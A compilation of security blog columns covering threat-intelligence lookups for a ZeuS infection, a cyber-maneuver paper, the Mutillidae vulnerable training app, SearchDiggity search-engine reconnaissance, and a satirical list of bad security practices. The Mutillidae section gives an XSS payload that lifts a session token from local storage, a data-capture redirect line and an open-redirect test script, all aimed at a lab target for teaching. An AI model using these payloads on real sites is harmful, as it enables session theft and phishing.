3) Crunch the data: cif_analytic -d -t 16 -m 2500 (you can up -t and -m on beefier systems but it may grind your system down)
4) Update the feeds: cif_feeds
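As that crontab, under the cif account, the sequence might look like the following sketch; the schedule shown is illustrative, so follow the Server Install page for the recommended timing:

  # crontab -e as user cif (times illustrative)
  PATH=/bin:/usr/local/bin:/opt/cif/bin
  30 * * * * cif_crontool -p hourly -T low
  0 4 * * * cif_crontool -p daily -T low
  0 5 * * * cif_analytic -d -t 16 -m 2500
  0 7 * * * cif_feeds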
You can run cif from the command line; cif -h will give you all the options, and cif -q <query string>, where the query string is an IP, URL, domain, etc., will get you started. Pay special attention to the -p parameter as it helps you define output formats such as HTML or Snort.
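A few concrete queries of the sort we’ll use below; the -p plugin names may vary with your install:

  cif -q 193.106.31.68                 # look up a suspicious IP
  cif -q mazilla-update.com            # look up a domain
  cif -q AS49335                       # everything tied to an ASN
  cif -q mazilla-update.com -p Snort   # emit Snort-formatted output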
I immediately installed the Firefox CIF toolbar; you’ll find details on the wiki under Client | Toolbars | Firefox. It makes queries via the browser, leveraging the API, a no-brainer. See WebAPI on the wiki under API. Screenshots included hereafter will be of CIF usage via this interface (easier than manually populating query URLs).
There are a number of client examples available on the wiki, but I’m always one to throw real-world scenarios at the tool du jour. As ZeuS developers continue to “innovate” and produce modules such as the recently discovered two-factor authentication bypass, ZeuS sees ever-increasing use by cybercriminals. As may likely be the common scenario, an end user on the network you try desperately to protect has called you to say that they tried to update Firefox via a link “someone sent them” but it “didn’t look right” and that they were worried “something was wrong.” You run netstat -ano on their system and see a suspicious connection, specifically 193.106.31.68. Ruh-roh, Rastro, that IP lives in the Ukraine. Go figure. What does Master Cifu say? Figure 1 fills us in.

FIGURE 1: CIF says “here be dragons”
I love mazilla-update.com, bad guy squatter genius. You need only web search ASN 49335 to learn that NCONNECT-AS Navitel Rusconnect Ltd is not a good neighborhood for your end user to be playing in. Better yet, run cif -q AS49335 at the command line or drop AS49335 in the Firefox search box.
Figure 2 is a case in point, Navitel Rusconnect Ltd is definitely the wrong side of the tracks.

FIGURE 2: Can I catch a bus out of here?
ZeuS configs and binaries, SpyEye, stolen credit card gateway, oh my.
This is a good time for a quick overview of taxonomy. Per the wiki, severity equates to seriousness, confidence denotes faith in the observation, and impact is a profile for badness (ZeuS, botnet, etc.).
Our above mentioned user does show mazilla-update.com in their browser history, let’s query it via CIF.
Figure 3 further validates suspicions.

FIGURE 3: Mazilla <> Mozilla
You quickly discern that your end user downloaded bt.exe from mazilla-update.com. You take a quick md5sum of the binary and drop the hash in the CIF search box. 756447e177fc3cc39912797b7ecb2f92 bears instant fruit as seen in Figure 4.

FIGURE 4: CIF hash search
Yep, looks like your end user might have gotten himself some ZeuS action.
With a resource such as CIF at your fingertips you should be able to quickly envision the value added when using a DNS sinkhole (hello 127.0.0.1) or DNS-BH from malwaredomains.com, where you serve up fake replies to any request for the likes of mazilla-update.com. Bonus! Beefy server for CIF: $2499. CIF licensing: $0. Bad guy fail? Priceless.

In Conclusion

Check out the Idea List in the CIF Projects Lab; there is some excellent work to be done, including a VMware appliance, further Snort integration, a VirusTotal analytic, and others. This project, like so many others we’ve discussed in toolsmith, grows and prospers with your feedback and contributions. Please consider participating by joining the CIF Google Group and jumping in. You’ll also want to check out the DFIR Journal’s CIF discussions, including integration with ArcSight, as well as EyeIS’s CIF incorporation with Splunk. These are the same folks who have brought us Security Onion 1.0 for Splunk, so I’m imagining all the possibilities for integration. Get busy with CIF, folks. It’s a work in progress but a damned good one at that.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Wes Young, CIF developer, Principal Security Engineer, REN-ISAC

MORPHINATOR & cyber maneuver as a defensive tactic

In June I read an outstanding paper from MAJ Scott Applegate, US Army, entitled The Principle of Maneuver in Cyber Operations, written as part of his work at George Mason University.
Then yesterday, I spotted a headline indicating that the US Army has awarded a contract to Raytheon to develop technology for Morphing Network Assets to Restrict Adversarial Reconnaissance, or MORPHINATOR.
Aside from possessing what might be the greatest acronym of all time (take that, APT), MORPHINATOR represents a defensive tactic well worthy of consideration in the private sector as well. While the Raytheon article is basically just a press release, I strongly advocate reading MAJ Applegate's paper at your earliest convenience. I will restate the principles for you here with the understanding that these are, for me, the highlights of this excellent research as you might consider them for private-sector use, and are to be entirely attributed to MAJ Applegate.
First, understand that the United States Military describes the concept of maneuver as "the disposition of forces to conduct operations by securing positional advantages before and or during combat operations."
MAJ Applegate proposes that the principles of maneuver as defined above require a significant amount of rethinking when applied to the virtual realm that constitutes cyberspace. "The methods and processes employed to attack and defend information resources in cyberspace constitute maneuver as they are undertaken to give one actor a competitive advantage over another."
While cyber maneuver as described in this paper include elements of offensive and defensive tactics, I think it most reasonable to explore defensive tactics as the primary mission when applied to the private sector.
While I privately and cautiously advocate active defense (offensive reaction to an attack) I'm not aware of too many corporate entities who readily embrace direct or overt offensive tactics.
The paper indicates that: "Cyber maneuver leverages positioning in the cyberspace domain to disrupt, deny, degrade, destroy, or manipulate computing and information resources. It is used to apply force, deny operation of or gain access to key information stores or strategically valuable systems." While this reads as a more offense-oriented statement, carry forward disrupt, deny, degrade, and manipulate to a defensive mindset.
Applying parts of MAJ Applegate's characteristics of cyber maneuver to defensive tactics would include speed, operational reach, dynamic evolution, and non-serial and distributed action. Consider these in the context of private sector networks while reviewing direct quotes from the paper as such.
  • Speed: "Actions in cyberspace can be virtually instantaneous, happening at machine speeds."
  • Operational Reach: "Reach in cyber operations tends to be limited by the scale of maneuver and the ability of an element to shield its actions from enemy observation, detection and reaction."
  • Dynamic evolution: "Recent years have seen rise to heavy use of web based applications, cloud computing, smart phones, and converging technologies. This ongoing evolution leads to constant changes in tactics, techniques and procedures used by both attackers and defenders in cyberspace."
  • Non-serial and distributed: "Maneuver in cyberspace allows attackers and defenders to simultaneously conduct actions across multiple systems at multiple levels of warfare. For defenders, this can mean hardening multiple systems simultaneously when new threats are discovered, killing multiple access points during attacks, collecting and correlating data from multiple sensors in parallel or other defensive actions."

Incorporating the above characteristics as part of defensive tactics for the private sector does not negate the need to fully understand and defend against the additional characteristics found in the research, including access & control, stealth & limited attribution, and rapid concentration. Liken access & control here to a "forward base" concept allowing attackers "to move the point of attack forward." Stealth & limited attribution clarifies that while action in cyberspace is "observable," most actions are not observed in a meaningful way. Think of this, in all seriousness, as "what you don't know will kill you." Rapid concentration represents the mass effect of botnets and DDoS attacks and the ease with which they're deployed in cyberspace. As defenders we must be entirely cognizant of these elements and ensure agility in our response to the threats they represent.

Now to close the loop (analogy intended, see the paper's reference to an OODA (Observe-Orient-Decide-Act) loop) as it pertains to defensive tactics. The Principle of Maneuver in Cyber Operations offers four Basic Forms of Defensive Cyber Maneuver, three of which directly apply to private sector network operations.
  1. Perimeter Defense & Defense in Depth: Well known, well discussed, but not always well-done. "While defense in depth is a more effective strategy than a line defense, both these defensive formations suffer from the fact that they are fixed targets with relatively static defenses which an enemy can spend time and resources probing for vulnerabilities with little or no threat of retaliation."
  2. Moving Target Defense: "This form of defensive maneuver uses technical mechanisms to constantly shift certain aspects of targeted systems to make it much more difficult for an attacker to be able to identify, target and successfully attack a target." This can be system level address space layout randomization (ASLR) or constantly moving virtual resources in cloud-based infrastructure.
  3. Deceptive Defense: "The use of these types of (honeypot) systems can allow a defender to regain the initiative by stalling an attack, giving the defender time to gather information on the attack methodology and then adjusting other defensive systems to account for the attacker’s tactics, techniques and procedures."
Drawing from part of MAJ Applegate's conclusion, when considering the principles described herein, "while maneuver in cyberspace is uniquely different than its kinetic counterparts, its objective remains the same, to gain a position of advantage over a competitor and to leverage that position for decisive success. It is therefore important to continue to study and define the evolving principle of maneuver in cyberspace to ensure the success of operations in this new warfighting domain."
I contend this is not a war pending, but a war upon us.
While The Principle of Maneuver in Cyber Operations discusses this declaration specific to military operations, we are well advised to consider this precision of message in the private sector. GEN Keith Alexander, U.S. Cyber Command chief and the director of the National Security Agency, was recently quoted as saying that the loss of intellectual property due to cyber attacks amounts to the “greatest transfer of wealth in human history.” GEN Alexander went on to say, "What I’m concerned about is the transition from disruptive to destructive attacks, and I think that’s coming. We have to be ready for that."
Private sector and military resources alike need to think in these terms and act decisively. Cyber maneuver tactics offer intriguing options to be certain.
Use MAJ Applegate's fine work as reference material to perpetuate this conversation, and may the MORPHINATOR be with you.

toolsmith: NOWASP Mutillidae


Prerequisites
XAMPP is most convenient
NOWASP can be configured to run on Linux, Mac, and Windows

Introduction
I’m writing this month’s column fresh on the heels of presenting OWASP Top 10 Tools and Tactics for a SANS @Night event at the SANSFIRE 2012 conference in Washington, DC. A quick shout-out to my fellow Internet Storm Center handlers who I met there, along with all the excellent folks I met while attending the event. During the presentation I used Damn Vulnerable Web Application (DVWA) as a vulnerable test bed against which I demonstrated a number of web application assessment tools. Having been a longtime OWASP WebGoat user for such purposes, I had recently learned of DVWA from a great article on the PenTest Laboratory site entitled 10 Vulnerable Web Applications You Can Play With. As one who likens himself to a dog or a crow with AADD (“Look! Squirrel! Shiny object!”), I literally read the article only enough to learn about DVWA and ran down that rabbit hole never to look back. There are of course other excellent resources in the article and it is with a red face and a sense of irony that I can tell you the author of the second vulnerable web application on the list was in the audience for the above-mentioned presentation. Jeremy Druin was extremely gracious and patiently waited until my presentation was over to tell me about his NOWASP Mutillidae. Had I only read that article past the first paragraph. Ah well, never too late to make amends. Jeremy’s timing was impeccable and fortuitous as there I was in search of this month’s topic. I immediately recruited him and asked for the requisite rundown on his creation.
"Mutillidae 2.x started with the idea to add "levels" to Mutillidae 1.x (created by Adrian Irongeek Crenshaw) with the idea that "level 0" would have no protection and "level 5" would have maximum protection. It was later discovered Mutillidae 1.x could not be easily upgraded and the project was rewritten and released in a separate fork. (Version 1.x is still available.). Once the Mutillidae 2.x fork was launched, several new vulnerabilities were added such that all OWASP 2007 and 2010 vulnerabilities were represented along with several others such as cross-frame scripting, forms-caching, information leakage via comments and html5 web-storage takeover.
Additional functionality was added to support CTF (capture the flag) contests, such as a page which automatically captures and logs all cookies, get, and post parameters of any user that "visits". A second page displays all captured data along with the user's IP address and the time of the capture. Based on feedback from users, the "hints" functionality was greatly expanded by making three levels of hints with increasing verbosity, adding several hundred extra hints including source code, and having "bubbles" pop up in critically vulnerable areas when the user hovers over a particularly good target (i.e. a vulnerable input field)."

Jeremy also pointed out that video tutorials have been posted to the webpwnized YouTube Channel detailing how to use tools and exploit the system. There are dozens of videos showing how to use Burp Suite, w3af, and netcat along with several videos dedicated to exploits such as SQL injection, cross-site scripting, html-5 web storage alteration, and command injection. New video posts as well as new release notices for Mutillidae are tweeted to @webpwnized.

Installing NOWASP Mutillidae
If you choose to install NOWASP on a LAMP or XAMPP stack and are having database connectivity issues, note that NOWASP is configured for root with a blank password to connect to MySQL. You’ll need to provide the correct settings to connect to your MySQL instance on line 16 in /mutillidae/classes/MySQLHandler.php and line 11 in /mutillidae/config.inc. It’s already properly configured if you choose to utilize the Samurai WTF distribution, so no need to change it there.
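The relevant settings are plain PHP variables; a representative sketch follows (variable names may differ slightly between Mutillidae versions, so verify against your copy):

  <?php
  // mutillidae/config.inc -- database connection settings (sketch)
  $dbhost = 'localhost';
  $dbuser = 'root';   // default; change to your MySQL account
  $dbpass = '';       // default blank password; set yours here
  $dbname = 'nowasp';
  ?>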
I built Mutillidae from scratch quite easily on an Ubuntu 11.04 virtual machine and, once I made the above-mentioned configuration updates, Mutillidae was immediately functional.

Using NOWASP Mutillidae

According to Jeremy, "Mutillidae is being used as a web security training environment for corporate developer training where developers learn not only how web exploits work but how to exploit the sites themselves. Armed with this knowledge, they appreciate more readily the importance of writing secure code and understand better how to write secure code. Mutillidae is also used in a similar capacity in the graduate Information Security course at the University of Louisville Speed-Scientific Engineering School. Mutillidae has been included as a target in the Samurai-WTF web pen testing distribution since version 1.x and was recently added to Rapid7's Metasploitable-2 project. Over the last couple of years, Mutillidae has been part of CTF (capture the flag) competitions at Kentuckiana ISSA conferences and the 2012 AIDE Conference held at Marshall University. Because Mutillidae provides a well-understood set of vulnerabilities beyond the OWASP Top 10, it is used as a platform to evaluate security assessment tools in order to see which issues the tool can identify."
No time like the present to see what all the positive feedback is about. Adrian has a great video on the Irongeek site describing five of the most well-known vulnerabilities found in the 2007 OWASP Top 10, specifically cross-site scripting (XSS), SQL/command injection flaws, malicious file execution, insecure direct object reference, and cross-site request forgery (CSRF/XSRF). Don’t forget the webpwnized YouTube channel as well! To break with what’s already well documented I’ve opted here to discuss discovery of some of the less well-known or popular vulnerabilities.
I’ll start you out of sequence in the OWASP Top 10 2010 with A8 - Failure To Restrict URL Access. Directly from the OWASP A8 description, applications do not always protect page requests properly. "Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack." What’s one of the best ways to discover potentially unrestricted URLs that should otherwise be protected? At the top on my list of first things to do during penetration tests is check for a robots.txt file. Robots.txt is usually used to teach search crawlers how to behave when interacting with your site (thou shalt not crawl) but it’s always used by attackers, good and bad, to find interesting functionality or pages you don’t wish dissected. Mutillidae teaches a quick lesson here via http://192.168.195.128/mutillidae/robots.txt as seen in Figure 1.
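If you'd rather not eyeball robots.txt by hand across a list of targets, a few lines of Python will enumerate the Disallow entries for you; a minimal sketch, assuming the Mutillidae instance above:

#!/usr/bin/env python
# Minimal sketch: enumerate Disallow entries from a target's robots.txt
import urllib2

url = 'http://192.168.195.128/mutillidae/robots.txt'
for line in urllib2.urlopen(url):
    line = line.strip()
    if line.lower().startswith('disallow'):
        print line.split(':', 1)[1].strip()

Each value printed is a path the site owner would prefer you not visit; treat that list as a starting map of interesting targets.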

Figure 1: Explore me
We find more than a few nuggets of goodness here, none of which should ever be exposed on a site you care about unless you want it tipped over in mere minutes. No need to read documentation or conduct a web search for an account with which to log in to Mutillidae; the accounts.txt file in the exposed passwords directory provides everything you need. The config.inc file and the classes directory are freely available for browsing, and config.inc will dump the above-mentioned MySQL database connection strings. We'll use content from the javascript directory against Mutillidae later in this discussion, and it's never a good idea to expose your site's documentation or the libraries you utilize to protect your site. The owasp-esapi-php directory contains the libraries and source code associated with the OWASP Enterprise Security API which, when properly configured and restricted, is an excellent method for protecting your site from OWASP Top 10 vulnerabilities.

The OWASP Top 10 2010 A8 category is closely related to A6 - Security Misconfiguration; I really consider Failure to Restrict URL Access a subset of the A6 category. A6 also includes scenarios such as an application server configuration that "allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide." So true. While playing with Mutillidae to learn about the Top 10 2010 A1 - Injection category, you may benefit from a nice example of improper error handling as seen in Figure 2.

Figure 2: Failure is always an option


HTML5 Web Storage serves as a great example of OWASP Top 10 2010-A7-Insecure Cryptographic Storage. It represents storage, sure, but when configured as badly (by design) as it is on Mutillidae, no cryptography will save you. Case in point, HTML5 local storage. Take note of localStorage.getItem and setItem calls implemented in HTML5 pages, as they help detect when developers build solutions that put sensitive information in local storage, which is a bad practice. Mutillidae offers excellent examples of ways to take advantage of getItem/setItem fail. You'll find some detailed test scripts to experiment with and modify in the Mutillidae documentation folder. Remember I said it's a good idea to protect documentation folders? I tweaked one of the examples to express my feelings for Mutillidae (setItem via MOD) and mock the victim while lifting their session data via XSS:

MOUSEOVER me and I’ll rob you blind! 
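In spirit, the payload boils down to a single element along these lines (a reconstruction for illustration; the tag and storage key name here are mine, not necessarily Mutillidae's exact markup):

<span onmouseover="alert(localStorage.getItem('Secure.Authentication'))">MOUSEOVER me and I'll rob you blind!</span>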

Figure 3 shows the resulting alert.

Figure 3: GotItem...like your Secure.Authentication token
While this example spawns an alert window when moused over, it could just as easily have been configured to write the results to an evil server. Mutillidae plays similarly for your pwn pleasure via the capture-data.php script, by defining the likes of document.location="http://localhost/mutillidae/capture-data.php?html5storage=" in test scripts.

Finally, a quick look at OWASP Top 10 2010-A10-Unvalidated Redirects and Forwards with Burp Suite Pro. Among the plethora of other vulnerabilities readily discovered with Burp’s Scanner functionality, it’s my favorite tool for discovering open redirects too. Browse the Mutillidae menu for OWASP Top 10 then A10 and scan the Credits page. Your results should match mine as seen in Figure 4.


Figure 4: forwardurl...to wherever you’d like
From CWE-601: "An HTTP parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance."
We wouldn't want that, would we?
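Verifying such a finding by hand is trivial too; a quick sketch follows (forwardurl comes straight from Figure 4; the page name is from my lab notes and may vary by Mutillidae version; the destination is illustrative):

#!/usr/bin/env python
# Minimal sketch: confirm the forwardurl parameter redirects wherever we say
import urllib2

target = ('http://192.168.195.128/mutillidae/index.php'
          '?page=redirectandlog.php&forwardurl=http://www.example.com')
resp = urllib2.urlopen(target)
# urllib2 follows HTTP redirects; landing anywhere other than the Mutillidae
# host confirms the open redirect
print 'Landed at:', resp.geturl()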
Clearly, Mutillidae as a learning tool is indispensable. Make use of it for your own learning as well as that of the development teams you support. Weave it into your SDLC practices; you can't go wrong.

In Conclusion

In late September, the current release of Mutillidae will be introduced at the upcoming annual Kentuckiana ISSA InfoSec Conference in Louisville, KY. This conference includes four different tracks, with Mutillidae slated as one of the breakout sessions in the web application security track. All you Kentucky-area ISSA members (and non-member readers), please consider attending and discovering more about this great learning tool. Everyone else, set up Mutillidae immediately, sit down with your developer teams, and ensure their full understanding of how important secure coding practices are. Use Mutillidae as a tool to help them achieve that understanding.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers...until next month.

Acknowledgements

Jeremy Druin, NOWASP Mutillidae 2.0 developer

toolsmith: SearchDiggity - Dig Before They Do

Prerequisites
Windows .NET Framework

Introduction
I've been conducting quite a bit of open source intelligence gathering (OSINT) recently as part of a variety of engagements and realized I hadn't discussed the subject since we last reviewed FOCA in March 2011 or Search Engine Security Auditing in June 2007. I'd recently had a few hits on my feed reader, and via at least one mailing list, regarding SearchDiggity from Fran Brown and Rob Ragan of Stach & Liu. They'd recently presented Pulp Google Hacking at the 4th Annual InfoSec Summit at ISSA Los Angeles as well as Tenacious Diggity at DEFCON 20, and the content certainly piqued my interest. One quick look at the framework and all its features and I was immediately intrigued. At first glance you'll note similarities to Wikto and FOCA given SearchDiggity's use of the Google Hacking Database and Shodan. This is no small irony as this team has taken point on rejuvenating the art of the search engine hack. In Fran's InformationWeek report, Using Google to Find Vulnerabilities In Your IT Environment, he discusses toolsmith favorites FOCA, Maltego, and Shodan amongst others. I'll paraphrase Fran from this March 2012 whitepaper to frame why using tools such as SearchDiggity and others in the Diggity arsenal is so important: use the same methods the bad guys do, namely search engines such as Google and Bing, to identify vulnerabilities in your applications, systems, and services, allowing you to fix them before they can be exploited. Fran and Rob's work has even hit mainstream media, with the likes of NotInMyBackyard (included in SearchDiggity) achieving coverage in USA Today. Suffice it to say that downloads from the Google Hacking Diggity Project pages jumped by 45,000 almost immediately, fueled largely by non-security consumers looking to discover any sensitive data leaks related to themselves or their organizations. A nice problem to have for the pair from Stach & Liu, and one Fran addressed with a blog post to provide a quick intro to NotInMyBackYardDiggity, to be discussed in more detail later in this article.
I reached out to Fran and Rob rather late in this month's writing process and am indebted to them as they kindly accommodated me with a number of resources as well as a few minutes for questions via telephone. There are Diggity-related videos and tool screenshots available, as well as all the presentations the team has given in the last few years. The SearchDiggity team is most proud of their latest additions to the toolset, including NotInMyBackyard and PortScan. Keep in mind that, like so many tools discussed in toolsmith, SearchDiggity and its various elements were written to accommodate the needs of the developers during their own penetration tests and assessments. No cached data is safe from the Diggity Duo's next generation search engine hacking arsenal, and all their tools are free for download and use.

Installing Search Diggity

SearchDiggity installation is point-and-click simple after downloading the installation package, but there are a few recommendations for your consideration. The default installation path is C:\Program Files (x86)\SearchDiggity, but consider using a non-system drive as an installation target to ensure no permissions anomalies; I installed in D:\tools\SearchDiggity. SearchDiggity writes results files to DiggityDownloads (I set D:\tools\DiggityDownloads under Options -> Settings -> General) and will need permission to its root in order to Update Query Definitions (search strings, Google/Bing Dorks).

Using SearchDiggity

I started my review of SearchDiggity capabilities with the Bing Hacking Database (BHDB) under the Bing tab, utilizing the menu referred to as BHDBv2NEW, as seen in Figure 1.

Figure 1: A BHDB analysis of HolisticInfosec.org
As with any tool, optimizing your scan settings for your target before you start the scan run is highly recommended. Given that my site is not an Adobe ColdFusion offering, there's really no need to look for CFIDE references, right? Ditto for Outlook Web Access or SharePoint, but CMS Config Files with XSS and SQL injection instreamset options are definitely in order. Good news: no significant findings were noted using my domain as the target.
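For context, the BHDB entries lean on Bing's instreamset: operator to approximate Google's inurl: and intitle:; a representative query, purely illustrative rather than a literal BHDB entry, looks something like:

site:holisticinfosec.org instreamset:(url title):login

Swap in your own domain and keywords to replicate a single BHDB check by hand.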

NotInMyBackyard is a recent addition to SearchDiggity for which the team has garnered a lot of deserved attention, and as such we'll explore it here. I used my name as my primary search parameter, configured Methods to include Quotes, and set Locations to include:
1)      Cloud Storage (Dropbox, Google Docs, Microsoft SkyDrive, Amazon AWS)
2)      Document Sharing (scribd.com, 4shared.com, issuu.com, docstoc.com, wepapers.com)
3)      Pastebin (pastebin.com, snipt.org, drupalbin.com, paste.ubuntu.com, tinypaste.com, paste2.org, codepad.org, dpaste.com, pastie.org, pastebin.mozilla.org)
4)      Social (Facebook, Twitter, YouTube, LinkedIn)
5)      Forums (groups.google.com)
6)      Public presentations, charts, graphs, and videos (Slideshare, Prezi, present.me, Gliffy, Vimeo, Dailymotion, Metacafe)
You can opt to set additional parameters such as Extensions for document types including all versions of Microsoft Office, PDF, CSV, and TXT, database types including MS-SQL and Access, backup, log, and config files, as well as test and script files. My favorites (utilized in a separate run) are the financial file options, including Quicken and QuickBooks data files and QuickBooks backup files. Finally, there are a number of granular keyword selections to narrow your query results that might include your patient records, places of birth, or your name in a data dump. This is extremely useful when trying to determine if your email address, as associated with one of your primary accounts, has been accumulated in a data dump posted to a Pastebin-like offering. Just keep in mind, the more options you select the longer your query run will take. I typically carve my searches up into specific categories, then export the results to a file named for the category.
As seen in Figure 2, NotInMyBackyard reveals all available query results in a clean, legible manner that includes hyperlinks to the referenced results, allowing you to validate the findings.

Figure 2: NotInMyBackyard flushes out results
My search, as configured, was most enlightening with regard to all the copies of my material posted to other sites without my permission. It was also interesting to see where articles and presentation material were cited in academic work. Imagine using your organizational domain name, along with specific keywords and accounts, to discover what's exposed to the evildoers conducting the same activity.
You can focus similar activity, with more attention to the enterprise mindset, utilizing SearchDiggity's DLP offerings. First conduct a Google or Bing run against a domain of interest using the DLPDiggity Initial selection. Once the query run is complete, highlight all the files (CTRL-A works well) and click the download button. This will populate the download directory you configured with the files discovered using DLPDiggity Initial, against which you can then apply the full DLP menu. I did as described against a target that shall remain unnamed and found either valid findings or sample/example data that matched the search regex explicitly, as seen in Figure 3.

Figure 3: Data Leak Prevention with SearchDiggity
I only used the Quick Checks set here too. When you contemplate the likes of database connection strings, bank account numbers, and encryption-related findings, coupled with the requisite credit cards, SSNs, and other PII, it becomes immediately apparent how powerful this tool is for both prevention and discovery during the reconnaissance phase of a penetration test.

I'll cover one more SearchDiggity component, but as is usually the case with toolsmith topics, there is much about the tool du jour that remains unsaid. Be sure to check out the SearchDiggity Shodan and PortScan offerings on your own. I'm always particularly interested in Flash-related FAIL findings, and SearchDiggity won't disappoint here either. Start with a Google or Bing search against a target domain with FlashDiggity Initial enabled. Much as noted with the DLP feature, after discovery, SearchDiggity will download the SWF files it identifies with FlashDiggity Initial. As an example I ran this configuration without a domain specified. By default, for a Google search, 70 results per query will be returned. Suffice it to say that with the three specific queries defined in FlashDiggity Initial searches, I was quickly treated to 210 results, which I then opted to download. I switched over to the Flash menu and, for real s's and g's (work that one out on your own :-)), enabled all options. Figure 4 exemplifies (anonymously) just how concerning certain Flash implementations may be, particularly when utilized for administrative functions and authentication.

Figure 4: Find bad Flash with SearchDiggity
FlashDiggity decompiles the downloaded SWF files with Flare and stores the resulting .flr files in the download directory for your review. It should go without saying that flaw enumeration becomes all that much easier. As an example, FlashDiggity's getURL XSS detection discovered the following using geturl\(.*(_root\.|_level0\.|_global\.).*\) as its regex logic:
this.getURL('mailto:' + _global.escape(this.decodeEmailAddr(v2.emladdr)) + '?subject=' + _global.escape(v2.emlsubj) + '&body=' + _global.escape(this.getEmailContent()));
This snippet makes for interesting analysis. Risks associated with getURL are well documented, but the global escape may mitigate the issue. That said, the Flash file was created with TechSmith Camtasia in January 2009, and an XSS vulnerability was reported in October 2009 regarding SWF files created with Camtasia Studio. Yet SWF files hosted on TechSmith's Screencast service were not vulnerable, and more than one reference to Screencast was noted in the decompiled .flr file. With one FlashDiggity search, we were able to learn a great deal about potentially flawed Flash files subject to possible exploit.
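If you want to replay that detection outside SearchDiggity, the same regex drops neatly into a few lines of Python (the file name is illustrative):

#!/usr/bin/env python
# Minimal sketch: apply FlashDiggity's getURL XSS regex to a Flare-decompiled SWF
import re

pattern = re.compile(r'geturl\(.*(_root\.|_level0\.|_global\.).*\)', re.IGNORECASE)
for line in open('suspect.flr'):
    if pattern.search(line):
        print line.strip()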
And we didn’t even touch SearchDiggity’s malware analysis feature set.  

In Conclusion

As always I’ll remind you, please use SearchDiggity for good, not evil. Incorporating its use as part of your organizational defensive tactics is a worthy effort. Keep in mind that you can also leverage this logic as part of Google Hacking Diggity Defense Tools including Alert and Monitoring RSS feeds. Configure them with your specific and desired organizational parameters and enjoy real time alerting and monitoring via your RSS feed reader. For those of you defending Internet-facing SharePoint implementations you’ll definitely want to check out the SharePoint Diggity Hacking Project too.
Enjoy this tool arsenal from Stach & Liu’s Dynamic Duo; they’d love to hear from you with kudos, constructive criticism, and feature requests via diggity at stachliu.com.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Francis Brown and Rob Ragan, Managing Partners, Stach & Liu, Google Hacking Diggity project leads

The replacement security analyst's Top 10

I'm a huge football fan so the depth of my joy at the return of the "real" NFL referees cannot be measured. Given the replacement ref debacle I felt compelled to share a replacement security analyst's Top 10.
Note: at one time or another in my career I have truly heard all of these.
In no particular order...

  1. Disable AV altogether; it's inconvenient when moving malware samples around.
  2. Passwords longer than eight characters make it hard to do your job.
  3. Don't worry about chain of custody or evidence integrity, cases rarely go to court anyway.
  4. When a concerned user calls about a potentially compromised system, tell them to just run McAfee Stinger.
  5. Why would you want to keep DNS logs?
  6. Go ahead and give developers the ability to deploy code straight to production from their desktops. It helps them be agile and creates efficiency.
  7. Proxying egress web traffic is an invasion of privacy and makes users mad, so don't do it.
  8. Your vulnerability scanner is causing my service to crash! Turn it off!
  9. We don't need to fix XSS. You can't hack a server with it.
  10. But it is encrypted. We used MD5 hashing to store the credit cards in the database.
In a similar vein, you'll really enjoy Infosec Reactions if you haven't already seen it.
Welcome back, NFL refs. :-)
Cheers.

toolsmith: Network Security Toolkit (NST) - Packet Analysis Personified

Prerequisites
Virtualization software if you don’t wish to run NST as a LiveCD or install to dedicated hardware.

Introduction
As I write this I'm on the way back from SANS Network Security in Las Vegas, where I'd spent two days deeply entrenched analyzing packet captures during the lab portion of the GSE exam. During preparation for this exam I'd used a variety of VM-based LiveCD distributions to study and practice, amongst them Security Onion. There are three distributions I run as VMs that are always on immediate standby in my toolkit. They are, in no particular order, Doug Burks' brilliant Security Onion, Kevin Johnson's SamuraiWTF, and BackTrack 5 R3. Security Onion and SamuraiWTF have both been toolsmith topics for good reason; I've not covered BackTrack only because it would seem so cliché. I will tell you that I am extremely fond of Security Onion and consider it indispensable. As such, I hesitated to cover the Network Security Toolkit (NST) when I first learned of it while preparing for the lab, feeling as if it might violate some code of loyalty I felt to Doug and Security Onion. Weird, I know, and the truth is Doug would be one of the first to tell you that the more tools made available to defenders the better. NST represents a number of core principles inherent to toolsmith and the likes of Security Onion. NST is comprehensive and convenient and allows the analyst almost immediate and useful results. NST is an excellent learning tool and allows beginners and experts much success in discovering more about their network environments. NST is also an inclusive, open project that grows with help from an interested and engaged community. The simple truth is Security Onion and NST represent different approaches to complex problems. We all have a community to serve and the same goals at heart, so I got over my hesitation and reached out to the NST project leads.
The Network Security Toolkit is the brainchild of Paul Blankenbaker and Ron Henderson, a Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional. In the early days of NST, Paul and Ron found that they needed a common user interface and unified methodology for ease of access and efficiency in automating the configuration process. Ron's background in network computing and Paul's in software development led to what is now referred to as the NST WUI (Web User Interface). Given the wide range of open source networking tools whose command line interfaces differ from one application to the next, this was no small feat. The NST WUI now provides a means to allow easy access and a common look-and-feel for many popular network security tools, giving the novice the ability to point and click while also providing advanced users (security analysts, ethical hackers) options to work directly with command line console output.
According to Ron, one of the most beneficial tool enhancements that NST has to offer the network and security administrator is the Single-Tap and Multi-Tap Network Packet Capture interface. Essentially, adding a web-based front-end to Wireshark, Tcpdump, and Snort for packet capture analysis and decode has made it easy to perform these tasks using a web browser. With the new NST v2.16.0-4104 release they took it a step further and integrated CloudShark technology into the NST WUI for collaborative packet capture analysis, sharing, and management.
Ron is also fond of the Network Interface Bandwidth monitor. This tool is an interactive, dynamic, SVG/AJAX-enabled application integrated into the NST WUI for monitoring network bandwidth usage on each configured network interface in pseudo real-time. He designed this application with the controls of a standard digital oscilloscope in mind.
Ron is also proud of NST's ability to geolocate network entities. We'll further explore NST's current repertoire of network entities that can be geolocated with their associated applications, as well as Ron's other favorites mentioned above.
